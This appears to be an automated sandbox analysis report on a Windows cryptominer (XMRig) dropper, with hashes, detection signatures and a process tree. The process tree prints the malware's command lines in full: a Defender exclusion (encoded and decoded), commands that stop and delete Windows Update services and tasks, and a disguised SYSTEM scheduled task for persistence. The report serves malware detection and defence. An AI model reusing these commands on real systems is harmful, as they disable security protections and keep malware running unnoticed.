Analysis
- max time kernel: 299s
- max time network: 291s
- platform: windows10_x64
- resource: win10-20220414-en
- submitted: 16-05-2022 00:51
Static task: static1
Behavioral task: behavioral1
Sample: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
Resource: win7-20220414-en
General
- Target: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
- Size: 7.6MB
- MD5: 95104aa61ed30687c13e5c644d5722f3
- SHA1: f9788f808044d448f73203d93da0021cefb781ff
- SHA256: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
- SHA512: 99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes (description, ioc, process):
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
-
XMRig Miner Payload 5 IoCs
Matches (resource, yara_rule):
- behavioral2/memory/4544-380-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/4544-381-0x000000014036DB84-mapping.dmp (xmrig)
- behavioral2/memory/4544-382-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/4544-383-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
- behavioral2/memory/4544-397-0x0000000140000000-0x0000000140803000-memory.dmp (xmrig)
-
Executes dropped EXE 1 IoCs
Processes (pid, process):
- 3472 services.exe
-
Possible privilege escalation attempt 4 IoCs
Processes (pid, process):
- 4560 takeown.exe
- 4516 icacls.exe
- 4956 takeown.exe
- 4968 icacls.exe
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes (pid, process):
- 4560 takeown.exe
- 4516 icacls.exe
- 4956 takeown.exe
- 4968 icacls.exe
-
Drops file in System32 directory 3 IoCs
Processes (description, ioc, process):
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log (conhost.exe)
-
Suspicious use of SetThreadContext 2 IoCs
Processes (description, pid, process, target process):
- PID 4216 (conhost.exe) set thread context of PID 2128 (conhost.exe)
- PID 4216 (conhost.exe) set thread context of PID 4544 (svchost.exe)
-
Drops file in Program Files directory 3 IoCs
Processes (description, ioc, process):
- File created: C:\Program Files\Google\Libs\WR64.sys (conhost.exe)
- File created: C:\Program Files\Windows\services.exe (conhost.exe)
- File opened for modification: C:\Program Files\Windows\services.exe (conhost.exe)
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 52 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes (pid, process):
- 640
-
Suspicious use of AdjustPrivilegeToken 41 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
[1] C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\conhost.exe
      Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
          Decoded (UTF-16LE base64): <#eauc#> Add-MpPreference <#dh#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#yro#> -Force <#ajfa#>
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop UsoSvc
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop WaaSMedicSvc
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop wuauserv
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop bits
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop dosvc
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          - Modifies security service
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          - Modifies registry key
      [4] C:\Windows\system32\takeown.exe
          Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\icacls.exe
          Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
          - Creates scheduled task(s)
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\schtasks.exe
          Command line: schtasks /run /tn "GoogleUpdateTaskMachineQC"
[1] C:\Program Files\Windows\services.exe
    Command line: "C:\Program Files\Windows\services.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\conhost.exe
      Command line: "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
          Decoded (UTF-16LE base64): <#eauc#> Add-MpPreference <#dh#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#yro#> -Force <#ajfa#>
          - Drops file in System32 directory
          - Modifies data under HKEY_USERS
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop UsoSvc
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop WaaSMedicSvc
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop wuauserv
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop bits
      [4] C:\Windows\system32\sc.exe
          Command line: sc stop dosvc
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          - Modifies registry key
      [4] C:\Windows\system32\takeown.exe
          Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\icacls.exe
          Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          - Modifies registry key
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
    [3] C:\Windows\System32\conhost.exe
        Command line: C:\Windows\System32\conhost.exe
      [4] C:\Windows\System32\conhost.exe
          Command line: "C:\Windows\System32\conhost.exe" "ayfzchqlcjzzno"
      [?] C:\Windows\System32\svchost.exe
          Command line: C:\Windows\System32\svchost.exe hhmzomdryxklm1
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
Downloads
-
C:\Program Files\Windows\services.exe
Filesize: 7.6MB
MD5: 95104aa61ed30687c13e5c644d5722f3
SHA1: f9788f808044d448f73203d93da0021cefb781ff
SHA256: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
SHA512: 99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize: 539B
MD5: 84f2160705ac9a032c002f966498ef74
SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57